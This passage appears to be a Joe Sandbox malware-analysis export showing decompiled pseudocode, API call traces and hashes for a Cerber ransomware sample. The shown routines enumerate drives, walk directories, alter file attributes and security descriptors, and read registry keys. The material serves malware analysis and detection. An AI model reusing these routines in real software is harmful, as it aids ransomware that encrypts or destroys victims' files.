                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_v16 == 0) {
                                                                                                                                                                                        					E0040A6AC(_v20);
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					InterlockedIncrement( *(_t72 + 4));
                                                                                                                                                                                        					 *0x40f1dc( *((intOrPtr*)(_t72 + 0xc)));
                                                                                                                                                                                        					_t67 = _v16;
                                                                                                                                                                                        					if( *_t72 == 0) {
                                                                                                                                                                                        						_t49 =  *((intOrPtr*)(_t72 + 0x18));
                                                                                                                                                                                        						__eflags =  *_t49;
                                                                                                                                                                                        						if( *_t49 == 0) {
                                                                                                                                                                                        							_t50 =  *((intOrPtr*)(_t72 + 0x14));
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t50 =  *_t49;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						 *_t50 = _t67;
                                                                                                                                                                                        						_t67 = _v12;
                                                                                                                                                                                        						_t51 =  *((intOrPtr*)(_t72 + 0x18));
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t51 =  *((intOrPtr*)(_t72 + 0x10));
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *_t51 = _t67;
                                                                                                                                                                                        					_t52 =  *((intOrPtr*)(_t72 + 0x1c));
                                                                                                                                                                                        					if( *_t52 == 0) {
                                                                                                                                                                                        						 *_t52 = _v24;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t54 =  *_t52;
                                                                                                                                                                                        						while( *((intOrPtr*)(_t54 + 0xc)) != 0) {
                                                                                                                                                                                        							_t54 =  *((intOrPtr*)(_t54 + 0xc));
                                                                                                                                                                                        						}
                                                                                                                                                                                        						 *((intOrPtr*)(_t54 + 0xc)) = _v24;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *0x40f1e4( *((intOrPtr*)(_t72 + 0xc)));
                                                                                                                                                                                        				}
                                                                                                                                                                                        				E00405463( *(_t72 + 8));
                                                                                                                                                                                        				return E00405463(_t72);
                                                                                                                                                                                        			}



























                                                                                                                                                                                        0x0040a7ae
                                                                                                                                                                                        0x0040a7ae
                                                                                                                                                                                        0x0040a7b5
                                                                                                                                                                                        0x0040a7b7
                                                                                                                                                                                        0x0040a7bb
                                                                                                                                                                                        0x0040a7a2
                                                                                                                                                                                        0x0040a7a2
                                                                                                                                                                                        0x0040a7a2
                                                                                                                                                                                        0x0040a7be
                                                                                                                                                                                        0x0040a7c0
                                                                                                                                                                                        0x0040a7c5
                                                                                                                                                                                        0x0040a7e0
                                                                                                                                                                                        0x0040a7c7
                                                                                                                                                                                        0x0040a7c7
                                                                                                                                                                                        0x0040a7ce
                                                                                                                                                                                        0x0040a7cb
                                                                                                                                                                                        0x0040a7cb
                                                                                                                                                                                        0x0040a7d7
                                                                                                                                                                                        0x0040a7d7
                                                                                                                                                                                        0x0040a7e5
                                                                                                                                                                                        0x0040a7e5
                                                                                                                                                                                        0x0040a7f9
                                                                                                                                                                                        0x0040a80b

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00405F6B: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,0040833D,?,?,?,?,?,?,?,00000000), ref: 00405FA1
                                                                                                                                                                                          • Part of subcall function 00405F6B: GetProcAddress.KERNEL32(00000000), ref: 00405FA8
                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0040A6F5
                                                                                                                                                                                        • CharLowerBuffW.USER32(?,00000000), ref: 0040A6FF
                                                                                                                                                                                          • Part of subcall function 0040A419: wsprintfW.USER32 ref: 0040A464
                                                                                                                                                                                          • Part of subcall function 0040A419: GetFileAttributesW.KERNEL32(?), ref: 0040A479
                                                                                                                                                                                          • Part of subcall function 0040A419: GetFileSecurityW.KERNELBASE(?,00000001,?,00000400,?), ref: 0040A4A4
                                                                                                                                                                                          • Part of subcall function 0040A419: GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 0040A4BD
                                                                                                                                                                                          • Part of subcall function 0040A419: EqualSid.ADVAPI32(0042FA80,?), ref: 0040A4CF
                                                                                                                                                                                          • Part of subcall function 0040A419: GetFileAttributesW.KERNEL32(?), ref: 0040A4E8
                                                                                                                                                                                          • Part of subcall function 0040A419: SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A4FB
                                                                                                                                                                                          • Part of subcall function 0040A419: lstrcatW.KERNEL32(?,0040CEC8), ref: 0040A50D
                                                                                                                                                                                          • Part of subcall function 0040A419: FindFirstFileW.KERNEL32(?,?), ref: 0040A586
                                                                                                                                                                                          • Part of subcall function 0040A419: WaitForSingleObject.KERNEL32(00000000), ref: 0040A5A2
                                                                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 0040A78A
                                                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0040A793
                                                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0040A7E5
                                                                                                                                                                                          • Part of subcall function 0040A419: GetFileAttributesW.KERNEL32(?,?,0040A367,00000000), ref: 0040A518
                                                                                                                                                                                          • Part of subcall function 0040A419: SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A527
                                                                                                                                                                                          • Part of subcall function 0040A419: lstrlenW.KERNEL32(?,0040A367), ref: 0040A5DB
                                                                                                                                                                                          • Part of subcall function 0040A419: lstrlenW.KERNEL32(?), ref: 0040A602
                                                                                                                                                                                          • Part of subcall function 0040A419: CharLowerBuffW.USER32(?,00000000), ref: 0040A610
                                                                                                                                                                                          • Part of subcall function 0040A419: Sleep.KERNEL32(00000001), ref: 0040A621
                                                                                                                                                                                          • Part of subcall function 0040A419: FindNextFileW.KERNEL32(?,?), ref: 0040A690
                                                                                                                                                                                          • Part of subcall function 0040A419: FindClose.KERNEL32(?), ref: 0040A6A1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$Attributes$Findlstrlen$BuffCharCriticalLowerSectionSecurity$AddressCloseDescriptorEnterEqualFirstHandleIncrementInterlockedLeaveModuleNextObjectOwnerProcSingleSleepWaitlstrcatwsprintf
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2118666660-0
                                                                                                                                                                                        • Opcode ID: c2d51708b622c86e144e7ccd5543db7b920f71f6bfb5340e5e32611563adeae3
                                                                                                                                                                                        • Instruction ID: 13abfef68b097a612165134c634928f79b1fba2c5b552c62fd9ab30abf4ee98b
                                                                                                                                                                                        • Opcode Fuzzy Hash: c2d51708b622c86e144e7ccd5543db7b920f71f6bfb5340e5e32611563adeae3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F41BC35604301EFC311DF68C884C1ABBB4FB44310B14857AF449AB2A2D334ECA9CFAA
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E00406885(void* _a4, short* _a8) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                        				short _v532;
                                                                                                                                                                                        				short _v1052;
                                                                                                                                                                                        				long _t14;
                                                                                                                                                                                        				long _t19;
                                                                                                                                                                                        				int* _t30;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t30 = 0;
                                                                                                                                                                                        				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20119,  &_v8); // executed
                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                        					_v12 = 0x208;
                                                                                                                                                                                        					_t19 = RegQueryValueExW(_v8, E0040591C( &E0040D340, 0x10, 0xa58690a2), 0, 0,  &_v532,  &_v12); // executed
                                                                                                                                                                                        					if(_t19 == 0) {
                                                                                                                                                                                        						PathUnquoteSpacesW( &_v532);
                                                                                                                                                                                        						if(ExpandEnvironmentStringsW( &_v532,  &_v1052, 0x104) - 1 <= 0x103) {
                                                                                                                                                                                        							_t30 = E00405933(0,  &_v1052);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					RegCloseKey(_v8);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t30;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,00000000), ref: 004068A1
                                                                                                                                                                                        • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?), ref: 004068D7
                                                                                                                                                                                        • PathUnquoteSpacesW.SHLWAPI(?), ref: 004068E8
                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00406901
                                                                                                                                                                                          • Part of subcall function 00405933: lstrlenW.KERNEL32(?,00000000,0040691D,?), ref: 0040593E
                                                                                                                                                                                          • Part of subcall function 00405933: memcpy.NTDLL(00000000,?,00000002,00000000,00000000,0040691D,?), ref: 0040595E
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00406923
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseEnvironmentExpandOpenPathQuerySpacesStringsUnquoteValuelstrlenmemcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2229232589-0
                                                                                                                                                                                        • Opcode ID: d5f94109a22552542f79dd981f8c3c2a9d2cfe73a7d1d7489ccac6e0fbc3d8e3
                                                                                                                                                                                        • Instruction ID: 1c6706bfa8e7cfeb8a905d666c224299092f6be4206dfad9a6d2e40fcb3e7b74
                                                                                                                                                                                        • Opcode Fuzzy Hash: d5f94109a22552542f79dd981f8c3c2a9d2cfe73a7d1d7489ccac6e0fbc3d8e3
                                                                                                                                                                                        • Instruction Fuzzy Hash: E91130B2A0011CBBDB20ABA1DC49DDF7B7CEB04350F004475BA15E2590E6749A988FA8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                        			E00405E77(intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                                        				short _v524;
                                                                                                                                                                                        				short _v1044;
                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t23 = 0;
                                                                                                                                                                                        				_t12 =  *0x40e798(0, 0x28, 0xffffffff, 1,  &_v524); // executed
                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                        					_t15 =  *0x40e798(0, _a4, 0xffffffff, 1,  &_v1044); // executed
                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                        						_t25 = lstrlenW( &_v524);
                                                                                                                                                                                        						if(StrCmpNIW( &_v524,  &_v1044, _t25) == 0) {
                                                                                                                                                                                        							lstrcpyW(_a8, _t27 + _t25 * 2 - 0x40e);
                                                                                                                                                                                        							_t23 = 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t23;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000028,000000FF,00000001,?,00000000), ref: 00405E91
                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,0040A04B,000000FF,00000001,?), ref: 00405EAA
                                                                                                                                                                                        • lstrlenW.KERNEL32(?,00000000), ref: 00405EBC
                                                                                                                                                                                        • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00405ED3
                                                                                                                                                                                        • lstrcpyW.KERNEL32(00409B15,?), ref: 00405EE8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FolderPath$lstrcpylstrlen
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1609553816-0
                                                                                                                                                                                        • Opcode ID: 65910238698a16baef1403d8856055784a34b947144a8e198e14723933732cae
                                                                                                                                                                                        • Instruction ID: de2901f31616993a4ae986fc8dc4909f55669c9a08417f91c19eeb543ab8afdd
                                                                                                                                                                                        • Opcode Fuzzy Hash: 65910238698a16baef1403d8856055784a34b947144a8e198e14723933732cae
                                                                                                                                                                                        • Instruction Fuzzy Hash: 670144765001187BEB209B55DC48FEB37ACEB45714F404671FA26F21D0EA70DA958B58
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E00404CDC() {
                                                                                                                                                                                        				signed int _t3;
                                                                                                                                                                                        				long _t5;
                                                                                                                                                                                        				int _t7;
                                                                                                                                                                                        				signed short _t8;
                                                                                                                                                                                        				WCHAR* _t10;
                                                                                                                                                                                        				short _t11;
                                                                                                                                                                                        				int _t18;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t11 = 0;
                                                                                                                                                                                        				_t10 = PathSkipRootW(0x42fbc8);
                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                        					_t10 = 0x42fbc8;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                        					_t3 =  *_t10 & 0x0000ffff;
                                                                                                                                                                                        					if(_t3 == 0x5c || _t3 == 0x2f || _t3 == 0) {
                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L11:
                                                                                                                                                                                        					_t10 =  &(_t10[1]);
                                                                                                                                                                                        					continue;
                                                                                                                                                                                        					L5:
                                                                                                                                                                                        					_t8 = _t3;
                                                                                                                                                                                        					 *_t10 = 0; // executed
                                                                                                                                                                                        					_t5 = GetFileAttributesW(0x42fbc8); // executed
                                                                                                                                                                                        					if(_t5 == 0xffffffff) {
                                                                                                                                                                                        						_t7 = CreateDirectoryW(0x42fbc8, 0); // executed
                                                                                                                                                                                        						_t18 = _t7;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(_t18 == 0) {
                                                                                                                                                                                        						L13:
                                                                                                                                                                                        						return _t11;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						if(_t8 == 0) {
                                                                                                                                                                                        							_t11 = 1;
                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						 *_t10 = _t8;
                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                        • PathSkipRootW.SHLWAPI(C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000), ref: 00404CE8
                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000,00000001,00000000), ref: 00404D10
                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000,00000001), ref: 00404D1E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AttributesCreateDirectoryFilePathRootSkip
                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\d06ed635
                                                                                                                                                                                        • API String ID: 4231520044-561343493
                                                                                                                                                                                        • Opcode ID: 1bfba49f01c74f403b024d25f715790fdd7751a1fbd84344ea4d52c588a6695e
                                                                                                                                                                                        • Instruction ID: b5ef174f6fe4e018175640b39cc43a5cbe7dec1c5a9dae98cbdd48c22ee4a358
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1bfba49f01c74f403b024d25f715790fdd7751a1fbd84344ea4d52c588a6695e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 49F028A53012155BD7301AA96D0463776A8CFE27627210A7BFE91F22D0E63C8C026128
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                                        			E0040692E(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				short* _v20;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				long _t22;
                                                                                                                                                                                        				long _t27;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        				short* _t39;
                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                        				_t22 = RegOpenKeyExW(0x80000002, E0040591C(0x40d3ec, 0x38, 0xa9ebca9c), 0, 0x20119,  &_v16); // executed
                                                                                                                                                                                        				if(_t22 == 0) {
                                                                                                                                                                                        					if(RegQueryInfoKeyW(_v16, 0, 0, 0, 0,  &_v12, 0, 0, 0, 0, 0, 0) != 0) {
                                                                                                                                                                                        						L12:
                                                                                                                                                                                        						return RegCloseKey(_v16);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v12 = _v12 + 1;
                                                                                                                                                                                        					_t39 = E004053BD(_t33);
                                                                                                                                                                                        					if(_t39 == 0) {
                                                                                                                                                                                        						L11:
                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v5 = 0;
                                                                                                                                                                                        					_v20 = 0;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t27 = RegEnumKeyW(_v16, _v20, _t39, _v12); // executed
                                                                                                                                                                                        						if(_t27 != 0) {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t29 = E00406885(_v16, _t39); // executed
                                                                                                                                                                                        						_t44 = _t29;
                                                                                                                                                                                        						if(_t44 != 0) {
                                                                                                                                                                                        							_push(_a8);
                                                                                                                                                                                        							_push(_t44);
                                                                                                                                                                                        							if(_a4() != 0) {
                                                                                                                                                                                        								_v5 = 1;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							E00405463(_t44);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v20 = _v20 + 1;
                                                                                                                                                                                        					} while (_v5 == 0);
                                                                                                                                                                                        					E00405463(_t39);
                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t22;
                                                                                                                                                                                        			}















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,00000000,00020119,00000000,00000000,00409B30,00000000,?,00000000), ref: 0040695B
                                                                                                                                                                                        • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0040697A
                                                                                                                                                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,00000000,00000000), ref: 004069A9
                                                                                                                                                                                          • Part of subcall function 00406885: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,00000000), ref: 004068A1
                                                                                                                                                                                          • Part of subcall function 00406885: RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?), ref: 004068D7
                                                                                                                                                                                          • Part of subcall function 00406885: PathUnquoteSpacesW.SHLWAPI(?), ref: 004068E8
                                                                                                                                                                                          • Part of subcall function 00406885: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00406901
                                                                                                                                                                                          • Part of subcall function 00406885: RegCloseKey.ADVAPI32(?), ref: 00406923
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004069EC
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseOpenQuery$EnumEnvironmentExpandInfoPathSpacesStringsUnquoteValue
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3336427869-0
                                                                                                                                                                                        • Opcode ID: d4b18ec246cc545aebc2d9454a4f6d9b65cb319625587ec5a47d917e64776c67
                                                                                                                                                                                        • Instruction ID: 853463cecd8b6028bb46b6cb4b877976a71b5afdd9393abb8aaabce99423f380
                                                                                                                                                                                        • Opcode Fuzzy Hash: d4b18ec246cc545aebc2d9454a4f6d9b65cb319625587ec5a47d917e64776c67
                                                                                                                                                                                        • Instruction Fuzzy Hash: 75210272900118BFEB116BE49C85EEFBB7CEF00344F14407AF902B2181D7754E258B69
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                        			E0040B08E(intOrPtr* __eax, void* __ecx, short* _a4, short* _a8) {
                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				long _t15;
                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                        				long _t22;
                                                                                                                                                                                        				char* _t30;
                                                                                                                                                                                        				intOrPtr* _t34;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t28 = __ecx;
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_t34 = __eax;
                                                                                                                                                                                        				_t30 = 0;
                                                                                                                                                                                        				_t15 = RegOpenKeyExW(0x80000002, _a4, 0, 0x20119,  &_v12); // executed
                                                                                                                                                                                        				if(_t15 != 0) {
                                                                                                                                                                                        					L8:
                                                                                                                                                                                        					return _t30;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                        					_t18 = RegQueryValueExW(_v12, _a8, 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                        					if(_t18 == 0) {
                                                                                                                                                                                        						_t30 = E004053BD(_t28);
                                                                                                                                                                                        						if(_t30 != 0) {
                                                                                                                                                                                        							_t22 = RegQueryValueExW(_v12, _a8, 0, 0, _t30,  &_v8); // executed
                                                                                                                                                                                        							if(_t22 == 0) {
                                                                                                                                                                                        								if(_t34 != 0) {
                                                                                                                                                                                        									 *_t34 = _v8;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								E00405463(_t30);
                                                                                                                                                                                        								_t30 = 0;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					RegCloseKey(_v12);
                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}












                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,0040B57E,00000000,00020119,0040B57E,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0AE
                                                                                                                                                                                        • RegQueryValueExW.KERNEL32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0C8
                                                                                                                                                                                        • RegQueryValueExW.KERNEL32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0ED
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(0040B57E,?,?,?,?,0040B57E,00000000,?,?,00000000,?,?,00000000), ref: 0040B10E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLastQueryValue$CloseFreeHeapOpen
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3207664046-0
                                                                                                                                                                                        • Opcode ID: 16f9e4b66221e959ca600fa4562156c731eca4efc3bea92618bec30b8f58fea7
                                                                                                                                                                                        • Instruction ID: d330e1e9e1ceab0afd93f14912bc7271c4ca599fa294788e7f532a214b6da2e9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 16f9e4b66221e959ca600fa4562156c731eca4efc3bea92618bec30b8f58fea7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 62115E72600518BFEB105FA1CC85DBFBBBDEB843D4B14007AF915E6250E7708E059BA8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E0040A0A4() {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                        				long _t17;
                                                                                                                                                                                        				short* _t19;
                                                                                                                                                                                        				long _t20;
                                                                                                                                                                                        				short* _t26;
                                                                                                                                                                                        				long _t27;
                                                                                                                                                                                        				signed int _t30;
                                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t17 = GetLogicalDrives(); // executed
                                                                                                                                                                                        				_t30 = 0;
                                                                                                                                                                                        				_v20 = _t17;
                                                                                                                                                                                        				_v28 = 0x80000002;
                                                                                                                                                                                        				_v24 = 0x80000001;
                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t19 = E0040591C(0x40d860, 0x3b, 0xf6d84de6);
                                                                                                                                                                                        					_t33 = _t33 + 0xc;
                                                                                                                                                                                        					_t20 = RegOpenKeyExW( *(_t32 + _t31 * 4 - 0x18), _t19, 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                        					if(_t20 == 0) {
                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                        						_v16 = 4;
                                                                                                                                                                                        						_t26 = E0040591C(0x40d89c, 8, 0x19e52868);
                                                                                                                                                                                        						_t33 = _t33 + 0xc;
                                                                                                                                                                                        						_t27 = RegQueryValueExW(_v12, _t26, 0, 0,  &_v8,  &_v16); // executed
